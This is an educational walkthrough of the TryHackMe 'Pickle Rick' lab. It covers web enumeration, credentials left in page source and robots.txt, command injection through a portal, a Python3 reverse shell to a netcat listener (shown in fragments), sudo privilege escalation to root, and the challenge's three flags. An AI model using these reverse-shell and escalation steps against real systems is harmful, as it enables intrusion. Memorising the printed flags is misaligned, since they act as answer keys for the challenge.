TryHackMe Pickle Rick — Complete CTF Walkthrough (Step-by-Step)
TryHackMe Pickle Rick — Complete CTF Walkthrough (Step-by-Step)
Difficulty: Easy
Platform: TryHackMe
Room: Pickle Rick
Goal: Find 3 secret ingredients hidden on a web server to help Rick turn back into a human.
🧪 Introduction — What Is Pickle Rick?
If you are a fan of Rick and Morty, you will love this room. Rick has accidentally turned himself into a pickle (again), and he needs Morty's help — which means your help — to find 3 secret ingredients hidden on his computer so he can brew a potion to reverse the transformation.
This is one of the most popular beginner CTF rooms on TryHackMe. It teaches essential skills like:
- Web enumeration — finding hidden files and directories
- Source code analysis — spotting credentials in HTML comments
- Command injection — running system commands through a web interface
- Privilege escalation — gaining root access using misconfigured
sudopermissions
Even if you have never done a CTF before, this guide walks you through every step clearly.
🛠️ Tools You Will Need
| Tool | Purpose |
|---|---|
rustscan | Fast port discovery — finds all open ports in seconds |
nmap | Detailed scan — service versions and scripts on discovered ports |
gobuster / nikto | Directory and file brute-forcing |
netcat (nc) | Setting up a listener to catch a reverse shell |
| Web Browser | Accessing the target web application |
| TryHackMe AttackBox or OpenVPN | Connecting to the target machine |
🚀 Step 1 — Port Scanning with RustScan + nmap
Start the room on TryHackMe and boot the target machine. You will be given a target IP address (e.g. 10.10.x.x). Save this somewhere — you will use it throughout.
We use a two-phase scanning approach for speed and accuracy:
- RustScan — blazing fast, finds all open ports in seconds
- nmap — deep dive on only those ports (service versions, scripts, OS detection)
This is much faster than running a full nmap scan across all 65,535 ports from the start.
Phase 1 — RustScan (Fast Port Discovery)
RustScan scans all 65,535 ports in a matter of seconds by using parallel connections, then hands the results off to nmap automatically.
What each part means:
| Part | Meaning |
|---|---|
-a <TARGET_IP> | Target IP address to scan |
--ulimit 5000 | Allows 5000 open file descriptors — speeds up the scan significantly |
-- -sC -sV | Passes these flags directly to nmap after RustScan finds open ports |
RustScan output will show something like:
Open <TARGET_IP>:22
Open <TARGET_IP>:80
It immediately feeds these open ports into nmap for deeper analysis.
Phase 2 — Targeted nmap Scan
If you prefer to run nmap separately on just the ports RustScan found, use:
| Flag | Meaning |
|---|---|
-sC | Runs default NSE scripts (grabs banners, checks common vulns) |
-sV | Detects service and version info |
-p 22,80 | Scans only the ports RustScan already confirmed as open |
Scan Results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
Two ports are open:
- Port 22 — SSH: We cannot use this yet — no credentials. We will come back to this.
- Port 80 — HTTP: This is our entry point. Let's explore the web application.
🌐 Step 2 — Explore the Web Application
Open your browser and navigate to:
http://<TARGET_IP>
You will see a Rick and Morty themed webpage. Rick has left a message for Morty explaining he has turned himself into a pickle and needs help finding 3 secret ingredients.
It looks innocent — but there is hidden information waiting to be found.
🔍 Step 3 — View the Page Source Code
One of the first things you should always do in a web CTF is check the HTML source code. Developers sometimes leave sensitive information in code comments.
Right-click anywhere on the page and select "View Page Source" (or press Ctrl + U).
Look carefully at the bottom of the source code. You will find something like this:
🎯 Finding: We now have a username: R1ckRul3s
Write this down. We still need a password — keep reading.
📄 Step 4 — Check robots.txt
The robots.txt file tells search engines which pages not to crawl. In CTFs, it often contains juicy hidden information.
Navigate to:
http://<TARGET_IP>/robots.txt
You will find a strange string that looks nothing like a normal robots.txt entry:
Wubbalubbadubdub
🎯 Finding: This is Rick's password: Wubbalubbadubdub
Now we have both a username and a password. Time to find the login page.
📂 Step 5 — Directory Enumeration with Gobuster
We need to find hidden pages and directories on the web server. Use Gobuster to brute-force common file and directory names:
What Gobuster finds
/login.php (Status: 200)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/assets (Status: 301)
🎯 Finding: There is a login.php page — exactly what we were looking for.
🔐 Step 6 — Log In to the Portal
Navigate to:
http://<TARGET_IP>/login.php
Enter the credentials we found:
- Username:
R1ckRul3s - Password:
Wubbalubbadubdub
After logging in, you are redirected to portal.php — a Command Panel that lets you execute Linux commands directly on the server. This is a classic Remote Code Execution (RCE) vulnerability.
🧩 Step 7 — Finding Ingredient 1 (First Flag)
We now have command execution on the server. Start by listing the files in the current directory:
You will see several files, including one that stands out:
Sup3rS3cretPickl3Ingred.txt
clue.txt
Try reading Sup3rS3cretPickl3Ingred.txt with cat:
Note: The
catcommand is blacklisted in this challenge. Uselessinstead:
🏁 Flag 1 Found: mr. meeseek hair
Also check clue.txt:
It says: "Look around the file system for the other ingredient."
🧩 Step 8 — Finding Ingredient 2 (Second Flag)
Following the clue, let's explore the Linux file system. The /home directory is where user files live on Linux:
You will see two user directories:
rick
ubuntu
Navigate into Rick's home directory:
You will find a file called:
second ingredients
Read it (note: the filename has a space, so wrap it in quotes):
🏁 Flag 2 Found: 1 jerry tear
🐚 Alternative Method — Getting a Reverse Shell via Python3
This is an alternative approach to using the command panel directly. Instead of running commands one-by-one in the web interface, we can get a fully interactive shell on our own machine using a reverse shell. This is a core skill in real-world penetration testing.
What is a Reverse Shell?
Normally, you connect to a server (forward connection). A reverse shell flips this — the target machine connects back to you, giving you a live terminal session. This is useful when firewalls block inbound connections but allow outbound ones.
Step 8a — Check if Python3 is Available
In the command panel on portal.php, run:
This will likely return an error or nothing. Now try:
You should see something like:
Python3 is available. This is all we need to spawn a reverse shell.
Step 8b — Set Up a Netcat Listener on Your Machine
Before triggering the reverse shell, you need to listen for the incoming connection on your own machine (your TryHackMe AttackBox or local machine connected via OpenVPN).
Open a new terminal and run:
What each flag means:
| Flag | Meaning |
|---|---|
-l | Listen mode — wait for a connection |
-v | Verbose — show connection details |
-n | No DNS resolution — use IP addresses only |
-p 9001 | Listen on port 9001 |
Leave this terminal open and running. It is now waiting for the target to connect.
Step 8c — Trigger the Reverse Shell from the Command Panel
Go back to the command panel in your browser (portal.php). Paste the following command, replacing 10.10.10.10 with your own TryHackMe machine IP (your AttackBox or VPN IP — not the target IP):
💡 How to find your own IP: On your AttackBox, run
ifconfigorip aand look for thetun0interface — that is your TryHackMe VPN IP.
What this command does — explained simply
| Part | What it does |
|---|---|
export RHOST="10.10.10.10" | Sets your listener IP as an environment variable |
export RPORT=9001 | Sets your listener port |
import socket,os,pty | Imports Python libraries needed for networking and shell |
s.connect(...) | Target machine connects back to your listener |
os.dup2(s.fileno(),fd) for fd in (0,1,2) | Redirects stdin, stdout, stderr through the socket |
pty.spawn("sh") | Spawns a real interactive shell |
Step 8d — Catch the Shell
Switch back to your Netcat terminal. You should now see:
Listening on 0.0.0.0 9001
Connection received on 10.10.x.x
$
You now have a live shell on the target machine as www-data. You can navigate the file system freely.
Confirm who you are:
Output: www-data
Step 8e — Get the Second Flag via Reverse Shell
Now navigate to Rick's home directory and read the second ingredient:
🏁 Flag 2 Found: 1 jerry tear
⚡ Step 9 — Privilege Escalation to Root
The third ingredient is in the /root directory — which normally only the root user can access. This applies whether you are using the command panel or the reverse shell — the steps are identical.
Check sudo permissions
Run:
The output reveals something powerful:
(ALL) NOPASSWD: ALL
This means our current user (www-data) can run any command as root — without a password. This is a critical misconfiguration, and it is our path to the final flag.
Escalate to a full root shell
Unlike the command panel method where we just prefix commands with sudo, inside the reverse shell we can go further and spawn a full root bash shell:
Your prompt will change to:
root@ip-10-10-x-x:/var/www/html#
Confirm root access:
Output: root
You now have full root access to the machine. 🎉
🧩 Step 10 — Finding Ingredient 3 (Third Flag)
Via Command Panel (Method 1)
List the contents of the /root directory:
Read the final flag:
Via Reverse Shell as Root (Method 2)
Since we already escalated to root with sudo /bin/bash, just run:
Note:
catis only blocked in the web command panel — in a real shell, it works fine.
You will see:
3rd.txt
snap
🏁 Flag 3 Found: fleeb juice
✅ Summary — All Three Ingredients Found
| # | Location | Flag |
|---|---|---|
| 1 | /var/www/html/Sup3rS3cretPickl3Ingred.txt | mr. meeseek hair |
| 2 | /home/rick/second ingredients | 1 jerry tear |
| 3 | /root/3rd.txt | fleeb juice |
Rick can now brew his potion. Mission complete! 🎉
📚 Key Lessons From Pickle Rick
This room is a brilliant example of how a chain of small vulnerabilities leads to full system compromise. Here is what you learned:
1. Two-Phase Scanning Saves Time
Running RustScan first to discover open ports and then nmap only on those ports is far more efficient than a full nmap sweep. In CTFs and real assessments, this workflow becomes second nature quickly.
2. Source Code Review
Developers should never leave credentials or usernames in HTML comments. Always inspect page source during a web assessment.
2. robots.txt Can Leak Sensitive Information
The robots.txt file is publicly accessible. Never store passwords or sensitive paths there.
3. Directory Enumeration Is Essential
Without Gobuster, we would never have found login.php. Always brute-force directories as part of your enumeration phase.
4. Blacklist Filtering Is Weak Security
The command panel blocked cat but not less, tac, or other file-reading commands. Blacklists are easy to bypass — a proper allowlist is far more secure.
5. Overpermissive sudo Is Dangerous
Allowing www-data (a web server process user) to run ALL commands as root with no password is a critical misconfiguration. The principle of least privilege should always be applied.
6. Reverse Shells Give You Full Interactivity
The web command panel is limited — some commands are blocked and you cannot navigate directories with cd. A reverse shell gives you a proper interactive terminal, which is far more powerful during a real assessment. Always check if Python3, Perl, or Bash are available on the target for spawning one.
7. sudo /bin/bash = Instant Root Shell
If sudo -l shows (ALL) NOPASSWD: ALL, running sudo /bin/bash immediately drops you into a root shell. This is one of the most common privilege escalation techniques in CTFs and real environments alike.
🧭 Recommended Learning Path After Pickle Rick
If you enjoyed this room, here are the next steps to continue growing your skills on TryHackMe:
- Mr Robot CTF — A slightly harder web-focused challenge
- Basic Pentesting — Covers enumeration, brute-forcing, and privilege escalation
- OWASP Top 10 — Learn about the most common web vulnerabilities
- Linux Fundamentals — Strengthen your Linux command-line skills
🏁 Final Thoughts
Pickle Rick is the perfect first CTF room. It introduces real-world attack techniques in a fun, story-driven format. If you got stuck along the way, that is completely normal — the learning happens in those stuck moments.
Keep practising, document everything, and most importantly — have fun with it.
"Wubba lubba dub dub!" — Rick Sanchez
If this walkthrough helped you, share it with a fellow learner. Happy hacking! 🥒
Tags
Keep Reading